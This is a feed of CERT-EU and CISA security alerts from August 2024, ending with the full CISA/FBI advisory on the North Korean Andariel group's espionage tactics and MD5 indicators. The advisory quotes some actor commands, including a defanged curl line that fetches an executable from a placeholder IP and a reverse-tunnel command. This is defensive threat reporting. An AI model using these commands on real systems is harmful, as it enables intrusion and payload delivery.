Security – CERT Alerts ENG

Alerts from international Computer Emergency Response Teams (CERT-EU, US-CERT)

  • Versa Networks Releases Advisory for a Vulnerability in Versa Director, CVE-2024-39717
    by CISA (Alerts) on 27 August 2024 at 12:00 pm

    Versa Networks has released an advisory for a vulnerability (CVE-2024-39717) in Versa Director, a key component in managing SD-WAN networks, used by some Internet Service Providers (ISPs) and Managed Service Providers (MSPs). A cyber threat actor could exploit this vulnerability to take control of an affected system. CISA urges organizations to apply necessary updates, hunt for any malicious activity, report any positive findings to CISA, and review the following for more information:

      - Versa Security Bulletin: Update on CVE-2024-39717 – Versa Director Dangerous File Type Upload Vulnerability
      - Lumen: Taking the Crossroads: The Versa Director Zero-Day Exploitation

    CISA has added this vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 27 August 2024 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation:

      - CVE-2024-38856 Apache OFBiz Incorrect Authorization Vulnerability

    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • 2024-088: Chrome ZeroDay Vulnerabilities
    by Latest publications of type Security Advisories on 27 August 2024 at 8:52 am

    A critical zero-day vulnerability, CVE-2024-7971, has been identified and patched in Google Chrome. This marks the ninth such vulnerability discovered in 2024. The flaw, which has been actively exploited in the wild, is rooted in a type confusion issue within Chrome’s V8 JavaScript engine. This vulnerability allows attackers to potentially execute arbitrary code on affected systems. [New] On August 26, Google announced that it patched the tenth zero-day vulnerability in Chrome. This vulnerability is also reported as being exploited.

  • 2024-089: Critical Vulnerability in SonicWall SonicOS
    by Latest publications of type Security Advisories on 27 August 2024 at 8:04 am

    On August 23, 2024, SonicWall issued a security advisory regarding a critical access control vulnerability (CVE-2024-40766) in its SonicOS. This flaw could allow attackers to gain unauthorised access to resources or cause the firewall to crash. Updating as soon as possible is recommended.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 26 August 2024 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation:

      - CVE-2024-7971 Google Chromium V8 Type Confusion Vulnerability

    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Adds One Known Exploited Vulnerability to Catalog for Versa Networks Director
    by CISA (Alerts) on 23 August 2024 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation:

      - CVE-2024-39717 Versa Director Dangerous File Type Upload Vulnerability

    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Five Industrial Control Systems Advisories
    by CISA (Alerts) on 22 August 2024 at 12:00 pm

    CISA released five Industrial Control Systems (ICS) advisories on August 22, 2024. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

      - ICSA-24-235-01 Rockwell Automation Emulate3D
      - ICSA-24-235-02 Rockwell Automation 5015 – AENFTXT
      - ICSA-24-235-03 MOBOTIX P3 and Mx6 Cameras
      - ICSA-24-235-04 Avtec Outpost 0810
      - ICSA-20-282-02 Mitsubishi Electric MELSEC iQ-R Series (Update D)

    CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

  • 2024-085: Multiple Vulnerabilities in Moodle
    by Latest publications of type Security Advisories on 21 August 2024 at 12:19 pm

    On August 19, 2024, Moodle released a security advisory addressing sixteen vulnerabilities of various severities. Updating as soon as possible is recommended.

  • 2024-084: High Severity Vulnerabilities in F5 Products
    by Latest publications of type Security Advisories on 21 August 2024 at 12:17 pm

    On August 14, 2024, F5 released a security advisory addressing nine vulnerabilities in their products. Four of these vulnerabilities have been classified as high severity due to their potential to facilitate session hijacking and to lead to Denial-of-Service (DoS) attacks.

  • CISA Adds Four Known Exploited Vulnerabilities to Catalog
    by CISA (Alerts) on 21 August 2024 at 12:00 pm

    CISA has added four new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation:

      - CVE-2021-33044 Dahua IP Camera Authentication Bypass Vulnerability
      - CVE-2021-33045 Dahua IP Camera Authentication Bypass Vulnerability
      - CVE-2022-0185 Linux Kernel Heap-Based Buffer Overflow
      - CVE-2021-31196 Microsoft Exchange Server Information Disclosure Vulnerability

    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • ASD’s ACSC, CISA, FBI, and NSA, with the support of International Partners Release Best Practices for Event Logging and Threat Detection
    by CISA (Alerts) on 21 August 2024 at 12:00 pm

    Today, the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), CISA, FBI, NSA, and international partners are releasing Best Practices for Event Logging and Threat Detection. This guide will assist organizations in defining a baseline for event logging to mitigate malicious cyber threats. The increased prevalence of malicious actors employing living off the land (LOTL) techniques, such as living off the land binaries (LOLBins) and fileless malware, highlights the importance of implementing and maintaining an effective event logging program.

    CISA encourages public and private sector senior information technology (IT) decision makers, operational technology (OT) operators, network administrators, network operators, and critical infrastructure organizations to review the best practices in the guide and implement recommended actions. These actions can help detect malicious activity, behavioral anomalies, and compromised networks, devices, or accounts. For more information on LOTL techniques, see the joint guidance Identifying and Mitigating Living Off the Land Techniques and CISA’s Secure by Design Alert Series. For more information and guidance on event logging and threat detection, see CISA’s Secure Cloud Business Applications (SCuBA) products, the network traffic analysis tool Malcolm, and Logging Made Easy.

  • 2024-083: Palo Alto Cortex XSOAR CommonScripts Critical Vulnerability
    by Latest publications of type Security Advisories on 20 August 2024 at 9:15 am

    On August 14, 2024, Palo Alto Networks released a security advisory for a critical command injection vulnerability, CVE-2024-5914, in Cortex XSOAR. This flaw allows unauthenticated attackers to execute arbitrary commands within the context of an integration container, potentially compromising the system. The vulnerability affects the product’s CommonScripts Pack and is rated as high severity with a CVSS score of 9.0.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 19 August 2024 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation:

      - CVE-2024-23897 Jenkins Command Line Interface (CLI) Path Traversal Vulnerability

    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • 2024-082: Zabbix Server Critical Arbitrary Code Execution Vulnerability
    by Latest publications of type Security Advisories on 16 August 2024 at 8:46 am

    On August 13, 2024, a critical vulnerability, CVE-2024-22116, was disclosed in Zabbix Server, allowing attackers with restricted administrative permissions to execute arbitrary code. The flaw, identified in the Ping script execution within the Monitoring Hosts section, can compromise the entire infrastructure. The vulnerability carries a CVSS score of 9.9.

  • 2024-081: SolarWinds Web Help Desk Critical Remote Code Execution Vulnerability
    by Latest publications of type Security Advisories on 16 August 2024 at 8:41 am

    On August 14, 2024, SolarWinds disclosed a critical remote code execution (RCE) vulnerability, CVE-2024-28986, affecting all versions of their Web Help Desk (WHD) software. The vulnerability, caused by a Java deserialization flaw, allows attackers to execute arbitrary commands on the affected system. The vulnerability has a CVSS score of 9.8.

  • CISA Adds One Known Exploited Vulnerability to Catalog
    by CISA (Alerts) on 15 August 2024 at 12:00 pm

    CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation:

      - CVE-2024-28986 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability

    These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

  • CISA Releases Eleven Industrial Control Systems Advisories
    by CISA (Alerts) on 15 August 2024 at 12:00 pm

    CISA released eleven Industrial Control Systems (ICS) advisories on August 15, 2024. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

      - ICSA-24-228-01 Siemens SCALANCE M-800, RUGGEDCOM RM1224
      - ICSA-24-228-02 Siemens INTRALOG WMS
      - ICSA-24-228-03 Siemens Teamcenter Visualization and JT2Go
      - ICSA-24-228-04 Siemens SINEC Traffic Analyzer
      - ICSA-24-228-05 Siemens LOGO! V8.3 BM Devices
      - ICSA-24-228-06 Siemens SINEC NMS
      - ICSA-24-228-07 Siemens Location Intelligence
      - ICSA-24-228-08 Siemens COMOS
      - ICSA-24-228-09 Siemens NX
      - ICSA-24-228-10 AVEVA Historian Web Server
      - ICSA-24-228-11 PTC Kepware ThingWorx Kepware Server

    CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

  • 2024-080: Multiple Critical Vulnerabilities in Microsoft Products
    by Latest publications of type Security Advisories on 14 August 2024 at 2:09 pm

    On August 13, 2024, Microsoft addressed 89 vulnerabilities in its August 2024 Patch Tuesday update, including ten zero-day vulnerabilities. This Patch Tuesday also fixes six critical vulnerabilities.

  • 2024-079: Critical SAP Authentication Bypass Vulnerability
    by Latest publications of type Security Advisories on 14 August 2024 at 1:38 pm

    On August 13, 2024, SAP released a security advisory for a critical authentication bypass vulnerability, CVE-2024-41730, in SAP BusinessObjects Business Intelligence Platform. This flaw allows remote attackers to bypass authentication mechanisms, potentially leading to full system compromise. The vulnerability has a CVSS score of 9.8, highlighting its severity.

  • 2024-078: Ivanti vTM Critical Authentication Bypass Vulnerability
    by Latest publications of type Security Advisories on 14 August 2024 at 11:01 am

    On August 13, 2024, Ivanti disclosed a critical authentication bypass vulnerability, CVE-2024-7593, affecting the Ivanti Virtual Traffic Manager (vTM). This flaw allows remote, unauthenticated attackers to bypass authentication and create rogue administrator accounts, posing a significant security risk. The vulnerability is due to an incorrect implementation of the authentication algorithm.

  • North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs
    by CISA (CISA Cybersecurity Advisories) on 24 July 2024 at 4:37 pm

    Summary

    The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju:

      - U.S. Cyber National Mission Force (CNMF)
      - U.S. Cybersecurity and Infrastructure Security Agency (CISA)
      - U.S. Department of Defense Cyber Crime Center (DC3)
      - U.S. National Security Agency (NSA)
      - Republic of Korea’s National Intelligence Service (NIS)
      - Republic of Korea’s National Police Agency (NPA)
      - United Kingdom’s National Cyber Security Centre (NCSC)

    The RGB 3rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities.

    The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration. The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.

    The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations:

    For additional information on DPRK state-sponsored malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage.

    Download the PDF version of this report: AA24-207A North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs (PDF, 804.21 KB)

    For a downloadable copy of associated indicators of compromise (IOCs), see: AA24-207A STIX XML (XML, 296.99 KB) and AA24-207A STIX JSON (JSON, 140.84 KB)

    Technical Details

    RGB 3rd Bureau

    Andariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in Pyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks targeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware operations.

    Cyber Espionage

    The actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear, and engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for more victimology information.

    Table 1. Andariel Cyber Espionage Victimology (Industry: Information Targeted)

      - Defense:
          - Heavy and light tanks and self-propelled howitzers
          - Light strike vehicles and ammunition supply vehicles
          - Littoral combat ships and combatant craft
          - Submarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous underwater vehicles (AUVs)
          - Modeling and simulation services
      - Aerospace:
          - Fighter aircraft and unmanned aerial vehicles (UAVs)
          - Missiles and missile defense systems
          - Satellites, satellite communications, and nano-satellite technology
          - Surveillance radar, phased-array radar, and other radar systems
      - Nuclear:
          - Uranium processing and enrichment
          - Material waste and storage
          - Nuclear power plants
          - Government nuclear facilities and research institutes
      - Engineering:
          - Shipbuilding and marine engineering
          - Robot machinery and mechanical arms
          - Additive manufacturing and 3D printing components and technology
          - Casting, fabrication, high-heat metal molding, and rubber and plastic molding
          - Machining processes and technology

    The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs.

    Ransomware

    Andariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.

    Malicious Cyber Espionage Activity

    This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.

    Reconnaissance and Enumeration

    While there is limited available information on the group’s initial reconnaissance methods, the actors likely identify vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about their victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when published to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. CVEs researched include:

      - CVE-2023-46604 – Apache ActiveMQ
      - CVE-2023-42793 – TeamCity
      - CVE-2023-3519 – Citrix NetScaler
      - CVE-2023-35078 – Ivanti Endpoint Manager Mobile (EPMM)
      - CVE-2023-34362 – MOVEit
      - CVE-2023-33246 – RocketMQ
      - CVE-2023-32784 – KeePass
      - CVE-2023-32315 – Openfire
      - CVE-2023-3079 – Google Chromium V8 Type Confusion
      - CVE-2023-28771 and CVE-2023-33010 – Zyxel firmware
      - CVE-2023-2868 – Barracuda Email Security Gateway
      - CVE-2023-27997 – FortiGate SSL VPN
      - CVE-2023-25690 – Apache HTTP Server
      - CVE-2023-21932 – Oracle Hospitality Opera 5
      - CVE-2023-0669 – GoAnywhere MFT
      - CVE-2022-47966 – ManageEngine
      - CVE-2022-41352 and CVE-2022-27925 – Zimbra Collaboration Suite
      - CVE-2022-30190 – Microsoft Windows Support Diagnostic Tool
      - CVE-2022-25064 – TP-LINK
      - CVE-2022-24990 and CVE-2021-45837 – TerraMaster NAS
      - CVE-2022-24785 – Moment.js
      - CVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 – PHP Everywhere
      - CVE-2022-22965 – Spring4Shell
      - CVE-2022-22947 – Spring Cloud Gateway
      - CVE-2022-22005 – Microsoft SharePoint Server
      - CVE-2022-21882 – Win32k Elevation of Privilege
      - CVE-2021-44228 – Apache Log4j
      - CVE-2021-44142 – Samba vfs_fruit module
      - CVE-2021-43226, CVE-2021-43207, CVE-2021-36955 – Windows log file vulnerabilities
      - CVE-2021-41773 – Apache HTTP Server 2.4.49
      - CVE-2021-40684 – Talend ESB Runtime
      - CVE-2021-3018 – IPeakCMS 3.5
      - CVE-2021-20038 – SMA100 Apache httpd server (SonicWall)
      - CVE-2021-20028 – SonicWall Secure Remote Access (SRA)
      - CVE-2019-15637 – Tableau
      - CVE-2019-7609 – Kibana
      - CVE-2019-0708 – Microsoft Remote Desktop Services
      - CVE-2017-4946 – VMware V4H and V4PA

    Resource Development, Tooling, and Remote Access Tools

    The actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has developed RATs, including the following, to permit remote access and manipulation of systems and lateral movement:

      - Atharvan
      - ELF Backdoor
      - Jupiter
      - MagicRAT
      - “No Pineapple”
      - TigerRAT
      - Valefor/VSingle
      - ValidAlpha
      - YamaBot
      - NukeSped
      - Goat RAT
      - Black RAT
      - AndarLoader
      - DurianBeacon
      - Trifaux
      - KaosRAT
      - Preft
      - Andariel Scheduled Task Malware
      - BottomLoader (see Cisco Talos blog Operation Blacksmith)
      - NineRAT (see Cisco Talos blog Operation Blacksmith)
      - DLang (see Cisco Talos blog Operation Blacksmith)
      - Nestdoor (see AhnLab blog)

    These tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow the actors to maintain access to the victim system with each implant having a designated C2 node.

    Commodity Malware and Dual-Use Applications

    Commodity malware is malicious software widely available for purchase or use and is leveraged by numerous different threat actors. Dual-use applications are software tools widely available for purchase or use that are commonly utilized by administrators and users for system administration or other legitimate purposes and also by threat actors for malicious activities. These dual-use applications may reside locally, known as Living Off the Land (LOTL) tools, or be transferred to the target system during the attack. The use of publicly available malware and dual-use applications enables the actors to conceal and obfuscate their identities and leads to attribution problems. The authoring agencies rely on custom malware and loaders, along with overlapping C2 nodes, to attribute commodity malware to the actors. The actors have at times achieved great success obfuscating their identities by leveraging open source malware.

    The authoring agencies have identified the following open-source and dual-use tools as used and/or customized by the actors:

      - 3Proxy [T1090]
      - AdFind [S0552]
      - AsyncRAT
      - DeimosC2
      - Impacket [T1090]
      - Juggernaut [T1040]
      - Lilith RAT
      - ORVX Web Shell
      - Mimikatz [S0002]
      - PLINK [T1572]
      - ProcDump [T1003]
      - PuTTY [T1572]
      - SOCKS5 [T1090]
      - Stunnel [T1572]
      - Web Shell by Orb (WSO)
      - WinRAR [T1560]
      - WinSCP [T1048]
      - RDP Wrapper [T1572]

    Initial Access

    The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation. The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously [T1190].

    Execution

    The actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration. While individual commands typically vary, the authoring agencies assess the actors prefer netstat commands, such as netstat –naop and netstat –noa [T1059]. Example commands used by the actors include the following:

      netstat –naop
      netstat –noa
      pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] <Remote_IP>
      curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe
      C:\windows\system32\cmd.exe /c systeminfo | findstr Logon

    These actors often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the English language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft Corporation”) found across numerous RGB 3rd Bureau malware samples.

    Defense Evasion

    The actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and other commercial tools has advanced anti-debugging and detection capabilities. These files are typically multiple megabytes in size and often contain unusual file section names such as vmp0 and vmp1 for VMProtect and Themida or randomized file section names for Themida [T1027].

    Credential Access

    The actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including the use of publicly available credential theft utilities and dual-use tools such as Mimikatz, Dumpert, and ProcDump, and accessing the Active Directory domain database through targeting of the NTDS.dit file. The authoring agencies assess the actors change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the vssadmin command-line utility to back up a volume to retrieve a copy of the NTDS.dit file containing Active Directory data. In another instance, the actors were observed collecting registry hive data for offline extraction of credentials [T1003].

    Discovery

    The actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files. The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes [T1087, T1083]. The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network [T1021.002].

    Lateral Movement

    The actors also use system logging for discovery to move laterally. The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the %Temp% directory. The actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021].

    Command and Control

    The actors leverage techniques and infrastructure positioned around the world to send commands to compromised systems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy [T1090, T1071].

    Collection and Exfiltration

    Malware previously used by the actors enabled them to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling [T1560, T1039]. The actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2.
Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data [T1567]. The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols [T1048]. The actors have also been identified staging files for exfiltration on victim machines, establishing Remote Desktop Protocol connections, and conducting HTTP GET requests on port 80 to receive information [T1021].

Indicators of Compromise

See below for Andariel IOCs. The following are observed MD5 hashes:

88a7c84ac7f7ed310b5ee791ec8bd6c5
6ab4eb4c23c9e419fbba85884ea141f4
97ce00c7ef1f7d98b48291d73d900181
079b4588eaa99a1e802adf5e0b26d8aa
0873b5744d8ab6e3fe7c9754cf7761a3
0d696d27bae69a62def82e308d28857a
0ecf4bac2b070cf40f0b17e18ce312e6
17c46ed7b80c2e4dbea6d0e88ea0827c
1f2410c3c25dadf9e0943cd634558800
2968c20a07cfc97a167aa3dd54124cda
33e85d0f3ef2020cdb0fc3c8d80e8e69
4118d9adce7350c3eedeb056a3335346
4aa57e1c66c2e01f2da3f106ed2303fa
58ad3103295afcc22bde8d81e77c282f
5c41cbf8a7620e10f158f6b70963d1cb
61a949553d35f31957db6442f36730c5
72a22afde3f820422cfdbba7a4cbabde
84bd45e223b018e67e4662c057f2c47e
86465d92f0d690b62866f52f5283b9fc
8b395cc6ecdec0900facf6e93ec48fbb
97f352e2808c78eef9b31c758ca13032
a50f3b7aa11b977ae89285b60968aa67
afd25ce56b9808c5ed7eade75d2e12a7
afdeb24975a318fc5f20d9e61422a308
b697b81b341692a0b137b2c748310ea7
bcac28919fa33704a01d7a9e5e3ddf3f
c027d641c4c1e9d9ad048cda2af85db6
c892c60817e6399f939987bd2bf5dee0
cdeae978f3293f4e783761bc61b34810
d0f310c99476f1712ac082f78dd29fdc
d8da33fae924b991b776797ba8cde24c
e230c5728f9ea5a94e390e7da7bf1ffa
f4d46629ca15313b94992f3798718df7
fb84a392601fc19aeb7f8ce11b3a4907
ff3194d3d5810a42858f3e22c91500b1
13b4ce1fc26d400d34ede460a8530d93
41895c5416fdc82f7e0babc6bb6c7216
c2f8c9bb7df688d0a7030a96314bb493
33a3da2de78418b89a603e28a1e8852c
4896da30a745079cd6265b6332886d45
73eb2f4f101aab6158c615094f7a632a
7f33d2d2a2ce9c195202acb59de31eee
e1afd01400ef405e46091e8ef10c721c
fe25c192875ec1914b8880ea3896cda2
232586f8cfe82b80fd0dfa6ed8795c56
c1f266f7ec886278f030e7d7cd4e9131
49bb2ad67a8c5dfbfe8db2169e6fa46e
beb199b15bd075996fa8d6a0ed554ca8
4053ca3e37ed1f8d37b29eed61c2e729
3a0c8ae783116c1840740417c4fbe678
0414a2ab718d44bf6f7103cff287b312
ca564428a29faf1a613f35d9fa36313f
ad6d4eb34d29e350f96dc8df6d8a092e
dc70dc9845aa747001ebf2a02467c203
3d2ec58f37c8176e0dbcc47ff93e5a76
0a09b7f2317b3d5f057180be6b6d0755
1ffccc23fef2964e9b1747098c19d956
9112efb49cae021abebd3e9a564e6ca4
ac0ada011f1544aa3a1cf27a26f2e288
0211a3160cc5871cbcd4e5514449162b
7416ea48102e2715c87edd49ddbd1526
a2aefb7ab6c644aa8eeb482e27b2dbc4
e7fd7f48fbf5635a04e302af50dfb651
33b2b5b7c830c34c688cf6ced287e5be
e5410abaaac69c88db84ab3d0e9485ac
eb35b75369805e7a6371577b1d2c4531
5a3f3f75048b9cec177838fb8b40b945
9d7bd0caed10cc002670faff7ca130f5
8434cdd34425916be234b19f933ad7ea
bbaee4fe73ccff1097d635422fdc0483
79e474e056b4798e0a3e7c60dd67fd28
95c276215dcc1bd7606c0cb2be06bf70
426bb55531e8e3055c942a1a035e46b9
cfae52529468034dbbb40c9a985fa504
deae4be61c90ad6d499f5bdac5dad242
bda0686d02a8b7685adf937cbcd35f46
6de6c27ca8f4e00f0b3e8ff5185a59d1
c61a8c4f6f6870c7ca0013e084b893d2
5291aed100cc48415636c4875592f70c
f4795f7aec4389c8323f7f40b50ae46f
cf1a90e458966bcba8286d46d6ab052c
792370eb01e16ac3dc511143932d0e1d
612538328e0c4f3e445fb58ef811336a
